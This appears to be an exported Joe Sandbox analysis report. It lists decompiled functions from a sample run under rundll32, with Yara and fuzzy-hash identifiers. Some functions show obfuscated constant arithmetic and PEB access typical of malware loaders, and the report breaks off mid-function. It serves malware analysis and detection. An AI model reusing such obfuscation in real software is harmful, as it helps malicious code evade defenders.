                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e97a60f92e4476a9044cdee827ee64364931a3f318d6e648f2f6c43f9dd04637
                                                                                                                      • Instruction ID: 03082812a3083140f0958ec5feffe4ae609ff78171114c85b7b752355c3f5e9e
                                                                                                                      • Opcode Fuzzy Hash: e97a60f92e4476a9044cdee827ee64364931a3f318d6e648f2f6c43f9dd04637
                                                                                                                      • Instruction Fuzzy Hash: 6631FFB5D02358EBDF06DFA8CA4A2DEBBB5EF44314F208099D501A7265D3B14B98EF40
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00689011 Relevance: .1, Instructions: 67COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E00689011(void* __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _t75;
				intOrPtr _t80;
				signed int _t88;
				signed int _t89;

				_v40 = _v40 & 0x00000000;
				_v44 = 0xa2b624;
				_v8 = 0x99eb9;
				_t88 = __edx;
				_v8 = _v8 * 0x25;
				_v8 = _v8 | 0x30e9a4b5;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0x3d7f3aa0;
				_v24 = 0x77b72d;
				_v24 = _v24 << 1;
				_v24 = _v24 ^ 0x00e56894;
				_v20 = 0x2ce6cf;
				_v20 = _v20 >> 6;
				_v20 = _v20 ^ 0x000f2bb3;
				_v32 = 0xab4cd;
				_v32 = _v32 >> 0xc;
				_v32 = _v32 ^ 0x0007aa85;
				_v28 = 0x1f3eea;
				_v28 = _v28 >> 9;
				_v28 = _v28 ^ 0x0004326d;
				_v12 = 0xc1e4f9;
				_v12 = _v12 ^ 0x329f08e7;
				_v12 = _v12 + 0xcc91;
				_v12 = _v12 >> 8;
				_v12 = _v12 ^ 0x0038f912;
				_v16 = 0x3b10d4;
				_t89 = 0x6f;
				_v16 = _v16 / _t89;
				_v16 = _v16 + 0xffff4357;
				_v16 = _v16 ^ 0xf8ba2c27;
				_v16 = _v16 ^ 0x074e6031;
				_v36 = 0x1364c3;
				_v36 = _v36 + 0x503c;
				_v36 = _v36 ^ 0x001cba9a;
				_push(_v20);
				_push(_v24);
				_t75 = E00695BFD(_v32, _v28, _v12, E0069DCF7(_v8, __ecx, _v36));
				_t80 =  *0x6a3df8; // 0x0
				 *((intOrPtr*)(_t80 + 4 + _t88 * 4)) = _t75;
				return E0068A8B0(_v16, _t74, _v36);
			}

















                                                                                                                      0x00689017
                                                                                                                      0x0068901b
                                                                                                                      0x00689022
                                                                                                                      0x0068902f
                                                                                                                      0x00689035
                                                                                                                      0x00689038
                                                                                                                      0x0068903f
                                                                                                                      0x00689043
                                                                                                                      0x0068904a
                                                                                                                      0x00689051
                                                                                                                      0x00689054
                                                                                                                      0x0068905b
                                                                                                                      0x00689062
                                                                                                                      0x00689066
                                                                                                                      0x0068906d
                                                                                                                      0x00689074
                                                                                                                      0x00689078
                                                                                                                      0x0068907f
                                                                                                                      0x00689086
                                                                                                                      0x0068908a
                                                                                                                      0x00689091
                                                                                                                      0x00689098
                                                                                                                      0x0068909f
                                                                                                                      0x006890a6
                                                                                                                      0x006890aa
                                                                                                                      0x006890b1
                                                                                                                      0x006890bb
                                                                                                                      0x006890c0
                                                                                                                      0x006890c3
                                                                                                                      0x006890ca
                                                                                                                      0x006890d1
                                                                                                                      0x006890d8
                                                                                                                      0x006890df
                                                                                                                      0x006890e6
                                                                                                                      0x006890ed
                                                                                                                      0x006890f0
                                                                                                                      0x00689107
                                                                                                                      0x0068910c
                                                                                                                      0x00689117
                                                                                                                      0x0068912b

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d8cead799c93764a18a694429a7a028afb750ee6c76631ed1e13a49fec9fcae9
                                                                                                                      • Instruction ID: 53ca08b56a4c8d7e2382cc042acdaaa8f77f1bf41d9bbcd811cd7a81e0ec2a0d
                                                                                                                      • Opcode Fuzzy Hash: d8cead799c93764a18a694429a7a028afb750ee6c76631ed1e13a49fec9fcae9
                                                                                                                      • Instruction Fuzzy Hash: B231F0B1D0021EEBCF48EFA5D94A4EEBBB5FF44318F208199D421B6250D7B90A59DF90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00687FF2 Relevance: .1, Instructions: 54COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00687FF2(void* __edx) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _t67;
				void* _t73;

				_v32 = _v32 & 0x00000000;
				_v40 = 0xdad9ef;
				_v36 = 0x9bb390;
				_v28 = 0x653306;
				_v28 = _v28 + 0xffff1628;
				_v28 = _v28 >> 3;
				_v28 = _v28 ^ 0x000c892d;
				_v12 = 0x5dd1e8;
				_v12 = _v12 ^ 0xb170c383;
				_v12 = _v12 | 0x2785cc64;
				_v12 = _v12 >> 5;
				_v12 = _v12 ^ 0x05b45dea;
				_v8 = 0x56f6d9;
				_v8 = _v8 + 0xc121;
				_t73 = __edx;
				_t67 = 0x41;
				_v8 = _v8 / _t67;
				_v8 = _v8 << 7;
				_v8 = _v8 ^ 0x00a76089;
				_v24 = 0xf5edfd;
				_v24 = _v24 | 0x2f446a90;
				_v24 = _v24 ^ 0x7c479bdf;
				_v24 = _v24 ^ 0x53b1dfb9;
				_v20 = 0xafa903;
				_v20 = _v20 + 0xffff9fdf;
				_v20 = _v20 ^ 0xafba618c;
				_v20 = _v20 ^ 0xaf136809;
				_v16 = 0x74f1b4;
				_v16 = _v16 >> 7;
				_v16 = _v16 | 0x7bde77db;
				_v16 = _v16 ^ 0x7bddce28;
				return E00681E22(_v28, _v24, _t73, E00681DB9(_t67), _v20, _v16);
			}














                                                                                                                      0x00687ff8
                                                                                                                      0x00687ffc
                                                                                                                      0x00688003
                                                                                                                      0x0068800a
                                                                                                                      0x00688011
                                                                                                                      0x00688018
                                                                                                                      0x0068801c
                                                                                                                      0x00688023
                                                                                                                      0x0068802a
                                                                                                                      0x00688031
                                                                                                                      0x00688038
                                                                                                                      0x0068803c
                                                                                                                      0x00688043
                                                                                                                      0x0068804a
                                                                                                                      0x00688055
                                                                                                                      0x0068805b
                                                                                                                      0x0068805e
                                                                                                                      0x00688061
                                                                                                                      0x00688065
                                                                                                                      0x0068806c
                                                                                                                      0x00688073
                                                                                                                      0x0068807a
                                                                                                                      0x00688081
                                                                                                                      0x00688088
                                                                                                                      0x0068808f
                                                                                                                      0x00688096
                                                                                                                      0x0068809d
                                                                                                                      0x006880a4
                                                                                                                      0x006880ab
                                                                                                                      0x006880af
                                                                                                                      0x006880b6
                                                                                                                      0x006880e2

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 880c888cbb4deb6cb63736a4bd77bb98d1251cff4ad54d84bc8c76c5b330e3fb
                                                                                                                      • Instruction ID: 73b6690caeb39e1fcefe94948f0f3cad0c520d5218c6269e9a3adb793f47856d
                                                                                                                      • Opcode Fuzzy Hash: 880c888cbb4deb6cb63736a4bd77bb98d1251cff4ad54d84bc8c76c5b330e3fb
                                                                                                                      • Instruction Fuzzy Hash: 0C21EFB2C0131EEBCB48DFE5D94A5EEFBB1BB15314F208189D511B6264C3B40B498F95
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00694087 Relevance: .0, Instructions: 2COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00694087() {

				return  *[fs:0x30];
			}



                                                                                                                      0x0069408d

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                      • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                                      • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10014DA8 Relevance: 45.7, APIs: 21, Strings: 5, Instructions: 229registrylibraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 84%
                                                                                                                      			E10014DA8(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t73;
				struct HINSTANCE__* _t78;
				_Unknown_base(*)()* _t79;
				struct HINSTANCE__* _t81;
				signed int _t92;
				signed int _t94;
				unsigned int _t97;
				void* _t113;
				unsigned int _t115;
				signed short _t123;
				unsigned int _t124;
				_Unknown_base(*)()* _t131;
				signed short _t133;
				unsigned int _t134;
				intOrPtr _t143;
				void* _t144;
				int _t145;
				int _t146;
				signed int _t164;
				void* _t167;
				signed int _t169;
				void* _t170;
				int _t172;
				signed int _t176;
				void* _t177;
				CHAR* _t181;
				void* _t183;
				void* _t184;

				_t167 = __edx;
				_t184 = _t183 - 0x118;
				_t181 = _t184 - 4;
				_t73 =  *0x100545cc; // 0xcd5fceb9
				_t181[0x118] = _t73 ^ _t181;
				_push(0x58);
				E10030D27(E10043F3E, __ebx, __edi, __esi);
				_t169 = 0;
				 *(_t181 - 0x40) = _t181[0x124];
				 *(_t181 - 0x14) = 0;
				 *(_t181 - 0x10) = 0;
				_t78 = GetModuleHandleA("kernel32.dll");
				 *(_t181 - 0x18) = _t78;
				_t79 = GetProcAddress(_t78, "GetUserDefaultUILanguage");
				if(_t79 == 0) {
					if(GetVersion() >= 0) {
						_t81 = GetModuleHandleA("ntdll.dll");
						if(_t81 != 0) {
							 *(_t181 - 0x14) = 0;
							EnumResourceLanguagesA(_t81, 0x10, 1, E10014522, _t181 - 0x14);
							if( *(_t181 - 0x14) != 0) {
								_t97 =  *(_t181 - 0x14) & 0x0000ffff;
								_t145 = _t97 & 0x3ff;
								 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t97 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t145);
								 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t145);
								 *(_t181 - 0x10) = 2;
							}
						}
					} else {
						 *(_t181 - 0x18) = 0;
						if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019, _t181 - 0x18) == 0) {
							 *(_t181 - 0x44) = 0x10;
							if(RegQueryValueExA( *(_t181 - 0x18), 0, 0, _t181 - 0x20,  &(_t181[0x108]), _t181 - 0x44) == 0 &&  *(_t181 - 0x20) == 1) {
								_t113 = E100312A0( &(_t181[0x108]), "%x", _t181 - 0x1c);
								_t184 = _t184 + 0xc;
								if(_t113 == 1) {
									 *(_t181 - 0x14) =  *(_t181 - 0x1c) & 0x0000ffff;
									_t115 =  *(_t181 - 0x1c) & 0x0000ffff;
									_t146 = _t115 & 0x3ff;
									 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t115 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t146);
									 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t146);
									 *(_t181 - 0x10) = 2;
								}
							}
							RegCloseKey( *(_t181 - 0x18));
						}
					}
				} else {
					_t123 =  *_t79() & 0x0000ffff;
					 *(_t181 - 0x14) = _t123;
					_t124 = _t123 & 0x0000ffff;
					_t164 = _t124 & 0x3ff;
					 *(_t181 - 0x1c) = _t164;
					 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t124 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t164);
					 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale( *(_t181 - 0x1c));
					 *(_t181 - 0x10) = 2;
					_t131 = GetProcAddress( *(_t181 - 0x18), "GetSystemDefaultUILanguage");
					if(_t131 != 0) {
						_t133 =  *_t131() & 0x0000ffff;
						 *(_t181 - 0x14) = _t133;
						_t134 = _t133 & 0x0000ffff;
						_t172 = _t134 & 0x3ff;
						 *((intOrPtr*)(_t181 - 0x2c)) = ConvertDefaultLocale(_t134 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t172);
						 *((intOrPtr*)(_t181 - 0x28)) = ConvertDefaultLocale(_t172);
						 *(_t181 - 0x10) = 4;
					}
					_t169 = 0;
				}
				 *(_t181 - 0x10) =  &(1[ *(_t181 - 0x10)]);
				_t181[ *(_t181 - 0x10) * 4 - 0x34] = 0x800;
				_t181[0x105] = 0;
				_t181[0x104] = 0;
				if(GetModuleFileNameA(0x10000000, _t181, 0x105) != _t169) {
					_t143 = 0x20;
					E10030030(_t169, _t181 - 0x64, _t169, _t143);
					 *((intOrPtr*)(_t181 - 0x64)) = _t143;
					 *(_t181 - 0x5c) = _t181;
					 *((intOrPtr*)(_t181 - 0x50)) = 0x3e8;
					 *(_t181 - 0x48) = 0x10000000;
					 *((intOrPtr*)(_t181 - 0x60)) = 0x88;
					E10014538(_t181 - 0x3c, 0xffffffff);
					 *(_t181 - 4) = _t169;
					if(E100145E8(_t181 - 0x3c, _t181 - 0x64) != 0) {
						E1001461E(_t181 - 0x3c);
					}
					_t176 = 0;
					if( *(_t181 - 0x10) <= _t169) {
						L23:
						 *(_t181 - 4) =  *(_t181 - 4) | 0xffffffff;
						E10014C3E(_t181 - 0x3c);
						_t92 = _t169;
						goto L24;
					} else {
						while(1) {
							_t94 = E10014B71( *(_t181 - 0x40), _t167, _t181[_t176 * 4 - 0x34]);
							if(_t94 != _t169) {
								break;
							}
							_t176 =  &(1[_t176]);
							if(_t176 <  *(_t181 - 0x10)) {
								continue;
							}
							goto L23;
						}
						_t169 = _t94;
						goto L23;
					}
				} else {
					_t92 = 0;
					L24:
					 *[fs:0x0] =  *((intOrPtr*)(_t181 - 0xc));
					_pop(_t170);
					_pop(_t177);
					_pop(_t144);
					return E1002F81E(_t92, _t144, _t181[0x118] ^ _t181, _t167, _t170, _t177);
				}
			}
































                                                                                                                      0x10014da8
                                                                                                                      0x10014da9
                                                                                                                      0x10014daf
                                                                                                                      0x10014db3
                                                                                                                      0x10014dba
                                                                                                                      0x10014dc0
                                                                                                                      0x10014dc7
                                                                                                                      0x10014dd8
                                                                                                                      0x10014ddf
                                                                                                                      0x10014de2
                                                                                                                      0x10014de5
                                                                                                                      0x10014de8
                                                                                                                      0x10014df6
                                                                                                                      0x10014df9
                                                                                                                      0x10014dfd
                                                                                                                      0x10014ecb
                                                                                                                      0x10014f87
                                                                                                                      0x10014f8b
                                                                                                                      0x10014f9f
                                                                                                                      0x10014fa2
                                                                                                                      0x10014fac
                                                                                                                      0x10014fb2
                                                                                                                      0x10014fca
                                                                                                                      0x10014fd6
                                                                                                                      0x10014fdb
                                                                                                                      0x10014fde
                                                                                                                      0x10014fde
                                                                                                                      0x10014fac
                                                                                                                      0x10014ed1
                                                                                                                      0x10014ee5
                                                                                                                      0x10014ef0
                                                                                                                      0x10014f06
                                                                                                                      0x10014f15
                                                                                                                      0x10014f2d
                                                                                                                      0x10014f32
                                                                                                                      0x10014f38
                                                                                                                      0x10014f44
                                                                                                                      0x10014f47
                                                                                                                      0x10014f59
                                                                                                                      0x10014f65
                                                                                                                      0x10014f6a
                                                                                                                      0x10014f6d
                                                                                                                      0x10014f6d
                                                                                                                      0x10014f38
                                                                                                                      0x10014f77
                                                                                                                      0x10014f77
                                                                                                                      0x10014ef0
                                                                                                                      0x10014e03
                                                                                                                      0x10014e0b
                                                                                                                      0x10014e0e
                                                                                                                      0x10014e11
                                                                                                                      0x10014e23
                                                                                                                      0x10014e2c
                                                                                                                      0x10014e34
                                                                                                                      0x10014e41
                                                                                                                      0x10014e44
                                                                                                                      0x10014e4b
                                                                                                                      0x10014e4f
                                                                                                                      0x10014e53
                                                                                                                      0x10014e56
                                                                                                                      0x10014e59
                                                                                                                      0x10014e66
                                                                                                                      0x10014e72
                                                                                                                      0x10014e77
                                                                                                                      0x10014e7a
                                                                                                                      0x10014e7a
                                                                                                                      0x10014e81
                                                                                                                      0x10014e81
                                                                                                                      0x10014e86
                                                                                                                      0x10014e89
                                                                                                                      0x10014ea0
                                                                                                                      0x10014ea7
                                                                                                                      0x10014eb6
                                                                                                                      0x10014fec
                                                                                                                      0x10014ff3
                                                                                                                      0x10015003
                                                                                                                      0x10015006
                                                                                                                      0x10015009
                                                                                                                      0x10015010
                                                                                                                      0x10015013
                                                                                                                      0x1001501a
                                                                                                                      0x10015026
                                                                                                                      0x10015030
                                                                                                                      0x10015035
                                                                                                                      0x10015035
                                                                                                                      0x1001503a
                                                                                                                      0x1001503f
                                                                                                                      0x1001505c
                                                                                                                      0x1001505c
                                                                                                                      0x10015063
                                                                                                                      0x10015068
                                                                                                                      0x00000000
                                                                                                                      0x10015041
                                                                                                                      0x10015041
                                                                                                                      0x10015048
                                                                                                                      0x10015050
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x10015052
                                                                                                                      0x10015056
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x10015058
                                                                                                                      0x1001505a
                                                                                                                      0x00000000
                                                                                                                      0x1001505a
                                                                                                                      0x10014ebc
                                                                                                                      0x10014ebc
                                                                                                                      0x1001506a
                                                                                                                      0x1001506d
                                                                                                                      0x10015075
                                                                                                                      0x10015076
                                                                                                                      0x10015077
                                                                                                                      0x1001508c
                                                                                                                      0x1001508c

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10014DC7
                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10014DE8
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10014DF9
                                                                                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 10014E2F
                                                                                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 10014E37
                                                                                                                      • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10014E4B
                                                                                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 10014E6F
                                                                                                                      • ConvertDefaultLocale.KERNEL32(000003FF), ref: 10014E75
                                                                                                                      • GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10014EAE
                                                                                                                      • GetVersion.KERNEL32 ref: 10014EC3
                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 10014EE8
                                                                                                                      • RegQueryValueExA.ADVAPI32 ref: 10014F0D
                                                                                                                      • _sscanf.LIBCMT ref: 10014F2D
                                                                                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 10014F62
                                                                                                                      • ConvertDefaultLocale.KERNEL32(7322FFF6), ref: 10014F68
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 10014F77
                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 10014F87
                                                                                                                      • EnumResourceLanguagesA.KERNEL32(00000000,00000010,00000001,10014522,?), ref: 10014FA2
                                                                                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 10014FD3
                                                                                                                      • ConvertDefaultLocale.KERNEL32(7322FFF6), ref: 10014FD9
                                                                                                                      • _memset.LIBCMT ref: 10014FF3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
                                                                                                                      • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                                                      • API String ID: 434808117-483790700
                                                                                                                      • Opcode ID: 65e42d20e5498d3f2b12d62d094999c60a842ca76fef1cc8bf600e845580613e
                                                                                                                      • Instruction ID: 7e9daad585b95ff1e899939a3d2ed629ef259dc49ac6fd8c909ded718bcfc143
                                                                                                                      • Opcode Fuzzy Hash: 65e42d20e5498d3f2b12d62d094999c60a842ca76fef1cc8bf600e845580613e
                                                                                                                      • Instruction Fuzzy Hash: A4818271D002699FDB10DFA5DD84AFEBBF9FB48341F11012AE944E7290DB789A41CB60
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002E129 Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 44registryclipboardCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E1002E129(intOrPtr* __ecx) {
				intOrPtr* _t27;

				_t27 = __ecx;
				 *_t27 = RegisterClipboardFormatA("Native");
				 *((intOrPtr*)(_t27 + 4)) = RegisterClipboardFormatA("OwnerLink");
				 *((intOrPtr*)(_t27 + 8)) = RegisterClipboardFormatA("ObjectLink");
				 *((intOrPtr*)(_t27 + 0xc)) = RegisterClipboardFormatA("Embedded Object");
				 *((intOrPtr*)(_t27 + 0x10)) = RegisterClipboardFormatA("Embed Source");
				 *((intOrPtr*)(_t27 + 0x14)) = RegisterClipboardFormatA("Link Source");
				 *((intOrPtr*)(_t27 + 0x18)) = RegisterClipboardFormatA("Object Descriptor");
				 *((intOrPtr*)(_t27 + 0x1c)) = RegisterClipboardFormatA("Link Source Descriptor");
				 *((intOrPtr*)(_t27 + 0x20)) = RegisterClipboardFormatA("FileName");
				 *((intOrPtr*)(_t27 + 0x24)) = RegisterClipboardFormatA("FileNameW");
				 *((intOrPtr*)(_t27 + 0x28)) = RegisterClipboardFormatA("Rich Text Format");
				 *((intOrPtr*)(_t27 + 0x2c)) = RegisterClipboardFormatA("RichEdit Text and Objects");
				return _t27;
			}




                                                                                                                      0x1002e136
                                                                                                                      0x1002e13f
                                                                                                                      0x1002e148
                                                                                                                      0x1002e152
                                                                                                                      0x1002e15c
                                                                                                                      0x1002e166
                                                                                                                      0x1002e170
                                                                                                                      0x1002e17a
                                                                                                                      0x1002e184
                                                                                                                      0x1002e18e
                                                                                                                      0x1002e198
                                                                                                                      0x1002e1a2
                                                                                                                      0x1002e1a7
                                                                                                                      0x1002e1ae

                                                                                                                      APIs
                                                                                                                      • RegisterClipboardFormatA.USER32(Native), ref: 1002E138
                                                                                                                      • RegisterClipboardFormatA.USER32(OwnerLink), ref: 1002E141
                                                                                                                      • RegisterClipboardFormatA.USER32(ObjectLink), ref: 1002E14B
                                                                                                                      • RegisterClipboardFormatA.USER32(Embedded Object), ref: 1002E155
                                                                                                                      • RegisterClipboardFormatA.USER32(Embed Source), ref: 1002E15F
                                                                                                                      • RegisterClipboardFormatA.USER32(Link Source), ref: 1002E169
                                                                                                                      • RegisterClipboardFormatA.USER32(Object Descriptor), ref: 1002E173
                                                                                                                      • RegisterClipboardFormatA.USER32(Link Source Descriptor), ref: 1002E17D
                                                                                                                      • RegisterClipboardFormatA.USER32(FileName), ref: 1002E187
                                                                                                                      • RegisterClipboardFormatA.USER32(FileNameW), ref: 1002E191
                                                                                                                      • RegisterClipboardFormatA.USER32(Rich Text Format), ref: 1002E19B
                                                                                                                      • RegisterClipboardFormatA.USER32(RichEdit Text and Objects), ref: 1002E1A5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ClipboardFormatRegister
                                                                                                                      • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                                                                                                                      • API String ID: 1228543026-2889995556
                                                                                                                      • Opcode ID: 59400726b86d90ec70e7cae638daa4a7ba4f983a7778b7d8b23ac204cd440048
                                                                                                                      • Instruction ID: dd0e5b84f65b6698509d1545b20fc89df91f0ad9f4cec7ea2b0b947e93895074
                                                                                                                      • Opcode Fuzzy Hash: 59400726b86d90ec70e7cae638daa4a7ba4f983a7778b7d8b23ac204cd440048
                                                                                                                      • Instruction Fuzzy Hash: 11013271800784AACB30EFB69C48C8BBAE4EEC5611322493EE295C7651E774D142CF88
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1003548E Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 91%
                                                                                                                      			E1003548E(void* __ebx, void* __edx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				void* _t37;
				struct HINSTANCE__* _t38;
				void* _t41;
				void* _t43;

				_t37 = __edx;
				_t30 = __ebx;
				_t38 = GetModuleHandleA("KERNEL32.DLL");
				if(_t38 != 0) {
					 *0x10057934 = GetProcAddress(_t38, "FlsAlloc");
					 *0x10057938 = GetProcAddress(_t38, "FlsGetValue");
					 *0x1005793c = GetProcAddress(_t38, "FlsSetValue");
					_t7 = GetProcAddress(_t38, "FlsFree");
					__eflags =  *0x10057934;
					_t41 = TlsSetValue;
					 *0x10057940 = _t7;
					if( *0x10057934 == 0) {
						L6:
						 *0x10057938 = TlsGetValue;
						 *0x10057934 = E10035111;
						 *0x1005793c = _t41;
						 *0x10057940 = TlsFree;
					} else {
						__eflags =  *0x10057938;
						if( *0x10057938 == 0) {
							goto L6;
						} else {
							__eflags =  *0x1005793c;
							if( *0x1005793c == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					__eflags = _t10 - 0xffffffff;
